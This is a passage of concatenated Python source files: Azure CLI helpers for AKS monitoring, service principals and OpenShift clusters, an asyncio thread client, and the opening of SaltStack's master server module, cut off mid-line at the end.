resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region}) default_workspace_params = { 'location': workspace_region, 'properties': { 'sku': { 'name': 'standalone' } } } async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview', default_workspace_params) ws_resource_id = '' while True: result = async_poller.result(15) if async_poller.done(): ws_resource_id = result.id break return ws_resource_id def _ensure_container_insights_for_monitoring(cmd, addon): # Workaround for this addon key which has been seen lowercased in the wild. if 'loganalyticsworkspaceresourceid' in addon.config: addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid') workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'] workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') # extract subscription ID and resource group from workspace_resource_id URL try: subscription_id = workspace_resource_id.split('/')[2] resource_group = workspace_resource_id.split('/')[4] except IndexError: raise CLIError('Could not locate resource group in workspace-resource-id URL.') # region of workspace can be different from region of RG so find the location of the workspace_resource_id resources = cf_resources(cmd.cli_ctx, subscription_id) try: resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview') location = resource.location except CloudError as ex: raise ex unix_time_in_millis = int( (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0) solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis) # pylint: disable=line-too-long template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "workspaceResourceId": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics Resource ID" } }, "workspaceRegion": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics workspace region" } }, "solutionDeploymentName": { "type": "string", "metadata": { "description": "Name of the solution deployment" } } }, "resources": [ { "type": "Microsoft.Resources/deployments", "name": "[parameters('solutionDeploymentName')]", "apiVersion": "2017-05-10", "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]", "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]", "properties": { "mode": "Incremental", "template": { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": {}, "variables": {}, "resources": [ { "apiVersion": "2015-11-01-preview", "type": "Microsoft.OperationsManagement/solutions", "location": "[parameters('workspaceRegion')]", "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "properties": { "workspaceResourceId": "[parameters('workspaceResourceId')]" }, "plan": { "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "product": "[Concat('OMSGallery/', 'ContainerInsights')]", "promotionCode": "", "publisher": "Microsoft" } } ] }, "parameters": {} } } ] } params = { "workspaceResourceId": { "value": workspace_resource_id }, "workspaceRegion": { "value": location }, "solutionDeploymentName": { "value": solution_deployment_name } } deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis) # publish the Container Insights solution to the Log Analytics workspace return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params, validate=False, no_wait=False, subscription_id=subscription_id) def _ensure_aks_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): file_name_aks = 'aksServicePrincipal.json' # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # We don't need to add role assignment for this created SPN else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks) return load_acs_service_principal(subscription_id, file_name=file_name_aks) def _ensure_osa_aad(cli_ctx, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, identifier=None, name=None, create=False, customer_admin_group_id=None): rbac_client = get_graph_rbac_management_client(cli_ctx) if create: # This reply_url is temporary set since Azure need one to create the AAD. app_id_name = 'https://{}'.format(name) if not aad_client_app_secret: aad_client_app_secret = _create_client_secret() # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6", additional_properties=None, type="Scope") # Read directory permissions on Windows Azure Active Directory API directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04", additional_properties=None, type="Role") required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access], additional_properties=None, resource_app_id="00000002-0000-0000-c000-000000000000") list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')" .format(app_id_name))) if list_aad_filtered: aad_client_app_id = list_aad_filtered[0].app_id # Updating reply_url with the correct FQDN information returned by the RP reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier) update_application(client=rbac_client.applications, object_id=list_aad_filtered[0].object_id, display_name=name, identifier_uris=[app_id_name], reply_urls=[reply_url], homepage=app_id_name, password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) logger.info('Updated AAD: %s', aad_client_app_id) else: result = create_application(client=rbac_client.applications, display_name=name, identifier_uris=[app_id_name], homepage=app_id_name, password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) aad_client_app_id = result.app_id logger.info('Created an AAD: %s', aad_client_app_id) # Get the TenantID if aad_tenant_id is None: profile = Profile(cli_ctx=cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() return OpenShiftManagedClusterAADIdentityProvider( client_id=aad_client_app_id, secret=aad_client_app_secret, tenant_id=aad_tenant_id, kind='AADIdentityProvider', customer_admin_group_id=customer_admin_group_id) def _ensure_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # add role first before save it if not _add_role_assignment(cli_ctx, 'Contributor', service_principal): logger.warning('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal) return load_acs_service_principal(subscription_id) def _create_client_secret(): # Add a special character to satsify AAD SP secret requirements special_chars = '!#$%&*-+_.:;<>=?@][^}{|~)(' special_char = special_chars[ord(os.urandom(1)) % len(special_chars)] client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char return client_secret def _get_rg_location(ctx, resource_group_name, subscription_id=None): groups = cf_resource_groups(ctx, subscription_id=subscription_id) # Just do the get, we don't need the result, it will error out if the group doesn't exist. rg = groups.get(resource_group_name) return rg.location def _print_or_merge_credentials(path, kubeconfig, overwrite_existing): """Merge an unencrypted kubeconfig into the file at the specified path, or print it to stdout if the path is "-". """ # Special case for printing to stdout if path == "-": print(kubeconfig) return # ensure that at least an empty ~/.kube/config exists directory = os.path.dirname(path) if directory and not os.path.exists(directory): try: os.makedirs(directory) except OSError as ex: if ex.errno != errno.EEXIST: raise if not os.path.exists(path): with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'): pass # merge the new kubeconfig into the existing one fd, temp_path = tempfile.mkstemp() additional_file = os.fdopen(fd, 'w+t') try: additional_file.write(kubeconfig) additional_file.flush() merge_kubernetes_configurations(path, temp_path, overwrite_existing) except yaml.YAMLError as ex: logger.warning('Failed to merge credentials to kube config file: %s', ex) finally: additional_file.close() os.remove(temp_path) def _remove_nulls(managed_clusters): """ Remove some often-empty fields from a list of ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags'] ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id'] sp_attrs = ['secret'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) for ap_profile in managed_cluster.agent_pool_profiles: for attr in ap_attrs: if getattr(ap_profile, attr, None) is None: delattr(ap_profile, attr) for attr in sp_attrs: if getattr(managed_cluster.service_principal_profile, attr, None) is None: delattr(managed_cluster.service_principal_profile, attr) return managed_clusters def _remove_osa_nulls(managed_clusters): """ Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags', 'plan', 'type', 'id'] ap_master_attrs = ['name', 'os_type'] net_attrs = ['peer_vnet_id'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) for attr in ap_master_attrs: if getattr(managed_cluster.master_pool_profile, attr, None) is None: delattr(managed_cluster.master_pool_profile, attr) for attr in net_attrs: if getattr(managed_cluster.network_profile, attr, None) is None: delattr(managed_cluster.network_profile, attr) return managed_clusters def _validate_aci_location(norm_location): """ Validate the Azure Container Instance location """ aci_locations = [ "australiaeast", "canadacentral", "centralindia", "centralus", "eastasia", "eastus", "eastus2", "eastus2euap", "japaneast", "northcentralus", "northeurope", "southcentralus", "southeastasia", "southindia", "uksouth", "westcentralus", "westus", "westus2", "westeurope" ] if norm_location not in aci_locations: raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) + ' The available locations are "{}"'.format(','.join(aci_locations))) def osa_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_osa_nulls(list(managed_clusters)) def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals location=None, compute_vm_size="Standard_D4s_v3", compute_count=3, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, vnet_prefix="10.0.0.0/8", subnet_prefix="10.0.0.0/24", vnet_peer=None, tags=None, no_wait=False, customer_admin_group_id=None): if location is None: location = _get_rg_location(cmd.cli_ctx, resource_group_name) agent_pool_profiles = [] agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='compute', # Must be 12 chars or less before ACS RP adds to it count=int(compute_count), vm_size=compute_vm_size, os_type="Linux", role=OpenShiftAgentPoolProfileRole.compute, subnet_cidr=subnet_prefix ) agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='infra', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", role=OpenShiftAgentPoolProfileRole.infra, subnet_cidr=subnet_prefix ) agent_pool_profiles.append(agent_node_pool_profile) agent_pool_profiles.append(agent_infra_pool_profile) agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='master', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", subnet_cidr=subnet_prefix ) identity_providers = [] # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set create_aad = False if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None: create_aad = True # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now try: client.get(resource_group_name, name) except CloudError: create_aad = True osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=aad_client_app_id, aad_client_app_secret=aad_client_app_secret, aad_tenant_id=aad_tenant_id, identifier=None, name=name, create=create_aad, customer_admin_group_id=customer_admin_group_id) identity_providers.append( OpenShiftManagedClusterIdentityProvider( name='Azure AD', provider=osa_aad_identity ) ) auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers) default_router_profile = OpenShiftRouterProfile(name='default') if vnet_peer is not None: from azure.cli.core.commands.client_factory import get_subscription_id from msrestazure.tools import is_valid_resource_id, resource_id if not is_valid_resource_id(vnet_peer): vnet_peer = resource_id( subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name, namespace='Microsoft.Network', type='virtualNetwork', name=vnet_peer ) network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer) osamc = OpenShiftManagedCluster( location=location, tags=tags, open_shift_version="v3.11", network_profile=network_profile, auth_profile=auth_profile, agent_pool_profiles=agent_pool_profiles, master_pool_profile=agent_master_pool_profile, router_profiles=[default_router_profile]) try: # long_running_operation_timeout=300 result = sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=osamc) result = LongRunningOperation(cmd.cli_ctx)(result) instance = client.get(resource_group_name, name) _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=osa_aad_identity.client_id, aad_client_app_secret=osa_aad_identity.secret, aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname, name=name, create=True) except CloudError as ex: raise ex def openshift_show(cmd, client, resource_group_name, name): mc = client.get(resource_group_name, name) return _remove_osa_nulls([mc])[0] def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False): instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. instance.agent_pool_profiles[0].count = int(compute_count) # pylint: disable=no-member # null out the AAD profile and add manually the masterAP name because otherwise validation complains instance.master_pool_profile.name = "master" instance.auth_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
threadclient.py
from __future__ import annotations import asyncio import concurrent.futures as conc import time from queue import Empty, Queue from threading import Lock, Thread from typing import Iterable, List, Optional, SupportsFloat, Union from .client import Client from .request import Request from .response import Response class ThreadFuture(conc.Future): def __init__(self) -> None: super().__init__() self._async_future = None def running(self) -> bool: return bool(self._async_future) def cancel(self) -> bool: while not self.running(): time.sleep(0.1) return self._async_future.cancel() def cancelled(self) -> bool: if not self.running(): return False return self._async_future.cancelled() def done(self) -> bool: if not self.running(): return False return self._async_future.done() def result(self, timeout: SupportsFloat = None) -> Union[Response, List[Response]]: start = time.time() while self._async_future is None or not self._async_future.done(): time.sleep(0.1) if timeout is not None and time.time() - start > timeout: raise conc.TimeoutError return self._async_future.result() class ThreadClient: def __init__(self, setting: Optional[dict] = None) -> None: self._queue = Queue() self._stop = ThreadFuture() self._lock = Lock() self._thread = Thread(target=self._thread_run, args=(setting,)) self._thread.start() self._repr = '<ThreadClient - Pending: 0 (0 batch) Processing: 0/0>' def _thread_run(self, setting) -> None: asyncio.run(self._async_run(setting)) def __repr__(self) -> str: return self._repr def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() async def _async_run(self, setting: Optional[dict]) -> None: async with Client(setting) as async_client: while True: _repr = repr(async_client) self._repr = '<Thread' + _repr[1:] try: # We must not use Queue.get(), which will otherwise # block the whole thread. future, requests = self._queue.get_nowait() except Empty: await asyncio.sleep(0.1) else: if future is self._stop: self._queue.task_done() break with self._lock: future._async_future = async_client.submit(requests) self._queue.task_done() def submit(self, requests: Union[Request, Iterable[Request]]) -> conc.Future: future = ThreadFuture() self._queue.put((future, requests)) return future def close(self) -> None: self._queue.put((self._stop, None)) self._thread.join()
master.py
# -*- coding: utf-8 -*- ''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python libs import os import re import time import errno import signal import shutil import stat import logging import hashlib try: import pwd except ImportError: # This is in case windows minion is importing pass import resource import subprocess import multiprocessing import sys # Import third party libs import zmq import yaml from M2Crypto import RSA # Import salt libs import salt.crypt import salt.utils import salt.client import salt.exitcodes import salt.payload import salt.pillar import salt.state import salt.runner import salt.auth import salt.wheel import salt.minion import salt.search import salt.key import salt.fileserver import salt.daemons.masterapi import salt.utils.atomicfile import salt.utils.event import salt.utils.verify import salt.utils.minions import salt.utils.gzip_util from salt.utils.debug import enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack from salt.exceptions import MasterExit from salt.utils.event import tagify # Import halite libs try: import halite HAS_HALITE = True except ImportError: HAS_HALITE = False try: import systemd.daemon HAS_PYTHON_SYSTEMD = True except ImportError: HAS_PYTHON_SYSTEMD = False log = logging.getLogger(__name__) def clean_proc(proc, wait_for_kill=10): ''' Generic method for cleaning up multiprocessing procs ''' # NoneType and other fun stuff need not apply if not proc: return try: waited = 0 while proc.is_alive(): proc.terminate() waited += 1 time.sleep(0.1) if proc.is_alive() and (waited >= wait_for_kill): log.error( 'Process did not die with terminate(): {0}'.format( proc.pid ) ) os.kill(signal.SIGKILL, proc.pid) except (AssertionError, AttributeError): # Catch AssertionError when the proc is evaluated inside the child # Catch AttributeError when the process dies between proc.is_alive() # and proc.terminate() and turns into a NoneType pass class SMaster(object): ''' Create a simple salt-master, this will generate the top level master ''' def __init__(self, opts): ''' Create a salt master server instance ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() self.crypticle = self.__prep_crypticle() def __prep_crypticle(self): ''' Return the crypticle used for AES ''' return salt.crypt.Crypticle(self.opts, self.opts['aes']) def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. ''' return salt.daemons.masterapi.access_keys(self.opts) class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance ''' # Warn if ZMQ < 3.2 if not(hasattr(zmq, 'zmq_version_info')) or \ zmq.zmq_version_info() < (3, 2): # PyZMQ 2.1.9 does not have zmq_version_info log.warning('You have a version of ZMQ less than ZMQ 3.2! There ' 'are known connection keep-alive issues with ZMQ < ' '3.2 which may result in loss of contact with ' 'minions. Please upgrade your ZMQ!') SMaster.__init__(self, opts) def _clear_old_jobs(self): ''' The clean old jobs function is the general passive maintenance process controller for the Salt master. This is where any data that needs to be cleanly maintained from the master is maintained. ''' # Set up search object search = salt.search.Search(self.opts) # Make Start Times last = int(time.time()) rotate = int(time.time()) # Init fileserver manager fileserver = salt.fileserver.Fileserver(self.opts) # Load Runners runners = salt.loader.runner(self.opts) # Init Scheduler schedule = salt.utils.schedule.Schedule(self.opts, runners) ckminions = salt.utils.minions.CkMinions(self.opts) # Make Event bus for firing event = salt.utils.event.MasterEvent(self.opts['sock_dir']) # Init any values needed by the git ext pillar pillargitfs = salt.daemons.masterapi.init_git_pillar(self.opts) # Clean out the fileserver backend cache salt.daemons.masterapi.clean_fsbackend(self.opts) old_present = set() while True: now = int(time.time()) loop_interval = int(self.opts['loop_interval']) if (now - last) >= loop_interval: salt.daemons.masterapi.clean_old_jobs(self.opts) if self.opts.get('publish_session'): if now - rotate >= self.opts['publish_session']: salt.crypt.dropfile( self.opts['cachedir'], self.opts['user']) rotate = now if self.opts.get('search'): if now - last >= self.opts['search_index_interval']: search.index() salt.daemons.masterapi.fileserver_update(fileserver) # check how close to FD limits you are salt.utils.verify.check_max_open_files(self.opts) try: for pillargit in pillargitfs: pillargit.update() except Exception as exc: log.error('Exception {0} occurred in file server update ' 'for git_pillar module.'.format(exc)) try: schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if schedule.loop_interval < loop_interval: loop_interval = schedule.loop_interval except Exception as exc: log.error( 'Exception {0} occurred in scheduled job'.format(exc) ) last = now if self.opts.get('presence_events', False): present = ckminions.connected_ids() new = present.difference(old_present) lost = old_present.difference(present) if new or lost: # Fire new minions present event data = {'new': list(new), 'lost': list(lost)} event.fire_event(data, tagify('change', 'presence')) data = {'present': list(present)} event.fire_event(data, tagify('present', 'presence')) old_present = present try: time.sleep(loop_interval) except KeyboardInterrupt: break def __set_max_open_files(self): # Let's check to see how our max open files(ulimit -n) setting is mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) if mof_h == resource.RLIM_INFINITY: # Unclear what to do with infinity... OSX reports RLIM_INFINITY as # hard limit,but raising to anything above soft limit fails... mof_h = mof_s log.info( 'Current values for max open files soft/hard setting: ' '{0}/{1}'.format( mof_s, mof_h ) ) # Let's grab, from the configuration file, the value to raise max open # files to mof_c = self.opts['max_open_files'] if mof_c > mof_h: # The configured value is higher than what's allowed log.info( 'The value for the \'max_open_files\' setting, {0}, is higher ' 'than what the user running salt is allowed to raise to, {1}. ' 'Defaulting to {1}.'.format(mof_c, mof_h) ) mof_c = mof_h if mof_s < mof_c: # There's room to raise the value. Raise it! log.info('Raising max open files value to {0}'.format(mof_c)) resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h)) try: mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) log.info( 'New values for max open files soft/hard values: ' '{0}/{1}'.format(mof_s, mof_h) ) except ValueError: # https://github.com/saltstack/salt/issues/1991#issuecomment-13025595 # A user under OSX reported that our 100000 default value is # still too high. log.critical( 'Failed to raise max open files setting to {0}. If this ' 'value is too low. The salt-master will most likely fail ' 'to run properly.'.format( mof_c ) ) def _pre_flight(self): ''' Run pre flight checks, if anything in this method fails then the master should not start up ''' errors = [] fileserver = salt.fileserver.Fileserver(self.opts) if not fileserver.servers: errors.append( 'Failed to load fileserver backends, the configured backends ' 'are: {0}'.format(', '.join(self.opts['fileserver_backend'])) ) if not self.opts['fileserver_backend']: errors.append('No fileserver backends are configured') if errors: for error in errors: log.error(error) log.error('Master failed pre flight checks, exiting\n') sys.exit(salt.exitcodes.EX_GENERIC) def start(self): ''' Turn on the master server components ''' self._pre_flight() log.info( 'salt-master is starting as user {0!r}'.format(salt.utils.get_user()) ) enable_sigusr1_handler() enable_sigusr2_handler() self.__set_max_open_files() clear_old_jobs_proc = multiprocessing.Process( target=self._clear_old_jobs) clear_old_jobs_proc.start() reqserv = ReqServer( self.opts, self.crypticle, self.key, self.master_key) reqserv.start_publisher() reqserv.start_event_publisher() reqserv.start_reactor() reqserv.start_halite() def sigterm_clean(signum, frame): ''' Cleaner method for stopping multiprocessing processes when a SIGTERM is encountered. This is required when running a salt master under a process minder like daemontools ''' log.warn( 'Caught signal {0}, stopping the Salt Master'.format( signum ) ) clean_proc(clear_old_jobs_proc) clean_proc(reqserv.publisher) clean_proc(reqserv.eventpublisher) if hasattr(reqserv, 'halite'): clean_proc(reqserv.halite) if hasattr(reqserv, 'reactor'): clean_proc(reqserv.reactor) for proc in reqserv.work_procs: clean_proc(proc) raise MasterExit signal.signal(signal.SIGTERM, sigterm_clean) try: reqserv.run() except KeyboardInterrupt: # Shut the master down gracefully on SIGINT log.warn('Stopping the Salt Master') raise SystemExit('\nExiting on Ctrl-c') class Halite(multiprocessing.Process): ''' Manage the Halite server ''' def __init__(self, hopts): super(Halite, self).__init__() self.hopts = hopts def run(self): ''' Fire up halite! ''' halite.start(self.hopts) class Publisher(multiprocessing.Process): ''' The publishing interface, a simple zeromq publisher that sends out the commands. ''' def __init__(self, opts): super(Publisher, self).__init__() self.opts = opts def run(self): ''' Bind to the interface specified in the configuration file ''' # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) # if 2.1 >= zmq < 3.0, we only have one HWM setting try: pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000)) # in zmq >= 3.0, there are separate send and receive HWM settings except AttributeError: pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000)) pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000)) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses pub_sock.setsockopt(zmq.IPV4ONLY, 0) pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) salt.utils.check_ipc_path_max_len(pull_uri) # Start the minion command publisher log.info('Starting the Salt Publisher on {0}'.format(pub_uri)) pub_sock.bind(pub_uri) # Securely create socket log.info('Starting the Salt Puller on {0}'.format(pull_uri)) old_umask = os.umask(0177) try: pull_sock.bind(pull_uri) finally: os.umask(old_umask) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: package = pull_sock.recv() pub_sock.send(package) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: if pub_sock.closed is False: pub_sock.setsockopt(zmq.LINGER, 1) pub_sock.close() if pull_sock.closed is False: pull_sock.setsockopt(zmq.LINGER, 1) pull_sock.close() if context.closed is False: context.term() class ReqServer(object): ''' Starts up the master request server, minions send results to this interface. ''' def __init__(self, opts, crypticle, key, mkey): self.opts = opts self.master_key = mkey self.context = zmq.Context(self.opts['worker_threads']) # Prepare the zeromq sockets self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts) self.clients = self.context.socket(zmq.ROUTER) if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'): # IPv6 sockets work for both IPv6 and IPv4 addresses self.clients.setsockopt(zmq.IPV4ONLY, 0) self.workers = self.context.socket(zmq.DEALER) self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) # Prepare the AES key self.key = key self.crypticle = crypticle def __bind(self): ''' Binds the reply server ''' dfn = os.path.join(self.opts['cachedir'], '.dfn') if os.path.isfile(dfn): try: os.remove(dfn) except os.error: pass log.info('Setting up the master communication server') self.clients.bind(self.uri) self.work_procs = [] for ind in range(int(self.opts['worker_threads'])): self.work_procs.append(MWorker(self.opts, self.master_key, self.key, self.crypticle)) for ind, proc in enumerate(self.work_procs): log.info('Starting Salt worker process {0}'.format(ind)) proc.start() self.workers.bind(self.w_uri) try: if HAS_PYTHON_SYSTEMD and systemd.daemon.booted(): systemd.daemon.notify('READY=1') except SystemError: # Daemon wasn't started by systemd pass while True: try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc def start_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.publisher = Publisher(self.opts) self.publisher.start() def start_event_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.eventpublisher = salt.utils.event.EventPublisher(self.opts) self.eventpublisher.start() def start_reactor(self): ''' Start the reactor, but only if the reactor interface is configured ''' if self.opts.get('reactor'): self.reactor = salt.utils.event.Reactor(self.opts) self.reactor.start() def start_halite(self): ''' If halite is configured and installed, fire it up! ''' if HAS_HALITE and 'halite' in self.opts: log.info('Halite: Starting up ...') self.halite = Halite(self.opts['halite']) self.halite.start() elif 'halite' in self.opts: log.info('Halite: Not configured, skipping.') else: log.debug('Halite: Unavailable.') def run(self): ''' Start up the ReqServer ''' self.__bind() def destroy(self): if self.clients.closed is False: self.clients.setsockopt(zmq.LINGER, 1) self.clients.close() if self.workers.closed is False: self.workers.setsockopt(zmq.LINGER, 1) self.workers.close() if self.context.closed is False: self.context.term() # Also stop the workers for worker in self.work_procs: if worker.is_alive() is True: worker.terminate() def __del__(self): self.destroy() class MWorker(multiprocessing.Process): ''' The worker multiprocess instance to manage the backend operations for the salt master. ''' def __init__(self, opts, mkey, key, crypticle): multiprocessing.Process.__init__(self) self.opts = opts self.serial = salt.payload.Serial(opts) self.crypticle = crypticle self.mkey = mkey self.key = key self.k_mtime = 0 def __bind(self): ''' Bind to the local port ''' context = zmq.Context(1) socket = context.socket(zmq.REP) w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Worker binding to socket {0}'.format(w_uri)) try: socket.connect(w_uri) while True: try: package = socket.recv() self._update_aes() payload = self.serial.loads(package) ret = self.serial.dumps(self._handle_payload(payload)) socket.send(ret) # Properly handle EINTR from SIGUSR1 except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc # Changes here create a zeromq condition, check with thatch45 before # making any zeromq changes except KeyboardInterrupt: socket.close() def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server ''' try: key = payload['enc'] load = payload['load'] except KeyError: return '' return {'aes': self._handle_aes, 'pub': self._handle_pub, 'clear': self._handle_clear}[key](load) def _handle_clear(self, load): ''' Take care of a cleartext command ''' log.info('Clear payload received with command {cmd}'.format(**load)) if load['cmd'].startswith('__'): return False return getattr(self.clear_funcs, load['cmd'])(load) def _handle_pub(self, load): ''' Handle a command sent via a public key pair ''' if load['cmd'].startswith('__'): return False log.info('Pubkey payload received with command {cmd}'.format(**load)) def _handle_aes(self, load): ''' Handle a command sent via an AES key ''' try: data = self.crypticle.loads(load) except Exception: return '' if 'cmd' not in data: log.error('Received malformed command {0}'.format(data)) return {} log.info('AES payload received with command {0}'.format(data['cmd'])) if data['cmd'].startswith('__'): return False return self.aes_funcs.run_func(data['cmd'], data) def _update_aes(self): ''' Check to see if a fresh AES key is available and update the components of the worker ''' dfn = os.path.join(self.opts['cachedir'], '.dfn') try: stats = os.stat(dfn) except os.error: return if stats.st_mode != 0100400: # Invalid dfn, return return if stats.st_mtime > 